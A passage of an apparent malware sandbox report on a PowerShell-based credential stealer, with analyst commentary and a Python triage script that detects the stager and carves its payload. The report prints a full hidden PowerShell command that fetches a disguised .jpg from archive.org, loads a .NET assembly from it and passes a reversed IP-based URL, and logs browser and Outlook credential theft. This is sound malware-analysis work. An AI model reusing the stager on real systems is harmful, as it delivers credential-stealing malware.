? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?e
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vggr/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dg? ? ? ? ?m? ? ? ? ?? ? ? ? ?z? ? ? ? ?de? ? ? ? ?m? ? ? ? ?? ? ? ? ?0? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?3? ? ? ? ?c8? ? ? ? ?aqb0? ? ? ? ?gu? ? ? ? ?bqbz? ? ? ? ?c8? ? ? ? ?dgbi? ? ? ? ?hm? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?xw? ? ? ? ?y? ? ? ? ?d? ? ? ? ?? ? ? ? ?mg? ? ? ? ?0? ? ? ? ?d? ? ? ? ?? ? ? ? ?nw? ? ? ? ?y? ? ? ? ?dy? ? ? ? ?lwb2? ? ? ? ?gi? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?go? ? ? ? ?c? ? ? ? ?bn? ? ? ? ?cc? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?e4? ? ? ? ?zqb3? ? ? ? ?c0? ? ? ? ?twbi? ? ? ? ?go? ? ? ? ?zqbj? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?bt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?e4? ? ? ? ?zqb0? ? ? ? ?c4? ? ? ? ?vwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? ? ?zqbc? ? ? ? ?hk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?hm? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?eq? ? ? ? ?bwb3? ? ? ? ?g4? ? ? ? ?b? ? ? ? ?bv? ? ? ? ?ge? ? ? ? ?z? ? ? ? ?be? ? ? ? ?ge? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?kq? ? ? ? ?7? ? ? ? ?cq? ? 
? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?wwbt? ? ? ? ?hk? ? ? ? ?cwb0? ? ? ? ?gu? ? ? ? ?bq? ? ? ? ?u? ? ? ? ?fq? ? ? ? ?zqb4? ? ? ? ?hq? ? ? ? ?lgbf? ? ? ? ?g4? ? ? ? ?ywbv? ? ? ? ?gq? ? ? ? ?aqbu? ? ? ? ?gc? ? ? ? ?xq? ? ? ? ?6? ? ? ? ?do? ? ? ? ?vqbu? ? ? ? ?ey? ? ? ? ?o? ? ? ? ?? ? ? ? ?u? ? ? ? ?ec? ? ? ? ?zqb0? ? ? ? ?fm? ? ? ? ?d? ? ? ? ?by? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?cg? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bh? ? ? ? ?hi? ? ? ? ?d? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?ei? ? ? ? ?qqbt? ? ? ? ?eu? ? ? ? ?ng? ? ? ? ?0? ? ? ? ?f8? ? ? ? ?uwbu? ? ? ? ?ee? ? ? ? ?ugbu? ? ? ? ?d4? ? ? ? ?pg? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bl? ? ? ? ?g4? ? ? ? ?z? ? ? ? ?bg? ? ? ? ?gw? ? ? ? ?yqbn? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cc? ? ? ? ?p? ? ? ? ?? ? ? ? ?8? ? ? ? ?eJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.vggr/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"Jump to behavior
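The second PowerShell stage recorded above is worth reading as a small protocol: it fetches a file that is named like an image (vbs.jpg on archive.org), treats the bytes as UTF-8 text, carves whatever sits between the literal markers `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes that into a .NET assembly, loads it with `Assembly.Load`, and invokes `dnlib.IO.Home.VAI` with a string argument written backwards. Reversing `'txt.VGGR/006/822.18.21.891//:ptth'` gives `http://198.12.81.228/600/RGGV.txt`, which is the URL the loaded assembly is handed (what VAI does with it is not shown on this page). Two practitioner notes: the expression `$startIndex -ge 0 -and $endIndex -gt $startIndex` is evaluated and then discarded, so a fetched file without markers makes `Substring` throw rather than fail cleanly; and `Assembly.Load` only succeeds on a PE image, so a carved blob that does not start with `MZ` is not the real payload. The triage helper below is an added example, not code from the Joe Sandbox report or from the sample. It flags a command line matching this download-and-load pattern, re-implements the marker carving with the bounds check actually enforced, checks the carved bytes for a PE header, and un-reverses the VAI argument. The "image" bytes and the stand-in assembly are constructed for the example; the command line is the one the report records.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# The deobfuscated second-stage command line exactly as the report records it
# (the powershell.exe -> powershell.exe step).
OBSERVED_CMDLINE = r"""
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
""".strip()

MARK_START = b"<<BASE64_START>>"
MARK_END = b"<<BASE64_END>>"

# Every one of these must appear (case-insensitively) for the command line to count
# as a download-and-Assembly::Load stager.
STAGER_MARKERS = (
    r"System\.Net\.WebClient",
    r"DownloadData|DownloadString",
    r"FromBase64String",
    r"\[System\.Reflection\.Assembly\]::Load",
    r"-executionpolicy\s+bypass",
)


def looks_like_assembly_load_stager(cmdline: str) -> bool:
    return all(re.search(p, cmdline, re.IGNORECASE) for p in STAGER_MARKERS)


def carve_marked_base64(blob: bytes) -> Optional[bytes]:
    """Same IndexOf/Substring carving as the stager, with the bounds check enforced.

    A missing or inverted marker pair returns None instead of throwing. Whitespace
    inside the base64 run is dropped because FromBase64String ignores it.
    """
    i = blob.find(MARK_START)
    j = blob.find(MARK_END)
    if i < 0 or j <= i:
        return None
    b64 = re.sub(rb"\s+", b"", blob[i + len(MARK_START):j])
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def is_pe(data: bytes) -> bool:
    """Assembly.Load needs a PE image: 'MZ' at offset 0, 'PE\\0\\0' at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def extract_vai_args(cmdline: str) -> List[str]:
    """Return the argument list passed to GetMethod('VAI').Invoke(...)."""
    m = re.search(r"\.Invoke\(\$null,\s*\[object\[\]\]\s*\((.*?)\)\)", cmdline, re.IGNORECASE | re.DOTALL)
    if not m:
        return []
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def triage(cmdline: str, fetched: bytes) -> Dict[str, object]:
    args = extract_vai_args(cmdline)
    payload = carve_marked_base64(fetched)
    return {
        "is_stager": looks_like_assembly_load_stager(cmdline),
        "vai_args": args,
        "second_stage_url": args[0][::-1] if args else None,  # the first argument is written backwards
        "payload_is_pe": is_pe(payload) if payload else False,
        "payload_len": len(payload) if payload else 0,
    }


# Constructed stand-in for the carved assembly: a minimal MZ/PE header skeleton, not real code.
FAKE_ASSEMBLY = (b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little")
                 + b"PE\x00\x00" + b"\x00" * 0x60)
# Constructed stand-in for vbs.jpg: JPEG-looking bytes, the marked base64 run, trailing bytes.
FAKE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
              + MARK_START + base64.b64encode(FAKE_ASSEMBLY) + MARK_END + b"\xff\xd9")

if __name__ == "__main__":
    for k, v in triage(OBSERVED_CMDLINE, FAKE_IMAGE).items():
        print(f"{k}: {v}")
```

The carving works on raw bytes rather than a UTF-8-decoded string; the markers and the base64 run are ASCII, so the offsets agree with the stager's own `IndexOf` on the decoded text, and the JPEG bytes around them never matter.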
                  Source: RegAsm.exe, 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434CB6 cpuid 14_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,14_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,14_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004489D7 GetSystemTimeAsFileTime,14_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B69E GetComputerNameExW,GetUserNameW,14_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 14_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Code function: \key3.db 14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
